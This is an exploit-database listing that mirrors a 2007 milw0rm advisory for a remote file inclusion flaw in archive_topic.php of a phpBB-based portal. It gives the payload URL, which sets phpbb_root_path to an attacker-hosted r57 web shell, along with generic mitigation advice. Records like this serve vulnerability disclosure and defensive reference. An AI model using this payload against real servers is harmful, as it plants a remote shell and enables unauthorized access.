header-logo
Suggest Exploit
vendor:
Xoron
by:
Unknown
7.5
CVSS
HIGH
Remote File Inclusion
CWE
Product Name: Xoron
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Xoron Exploit

The xoron exploit allows an attacker to include a remote file by manipulating the phpbb_root_path parameter in the archive_topic.php file. This can be used to execute malicious code or gain unauthorized access to the system.

Mitigation:

Update to a patched version of the software or apply a fix provided by the vendor. Remove any unnecessary or unused features or modules.
Source

Exploit-DB raw data:

------------------------

Found: xoron

------------------------

Vendor: http://www.integramod.nl/forum/portal.php

Download: http://sourceforge.net/project/showfiles.php?group_id=191355

------------------------
Exploit:

includes/archive/archive_topic.php?phpbb_root_path=http://attacker/shells/r57.txt?

------------------------

Kral kraldır!

------------------------

# milw0rm.com [2007-09-27]

Navigation

Suggest Exploit

Services By CQR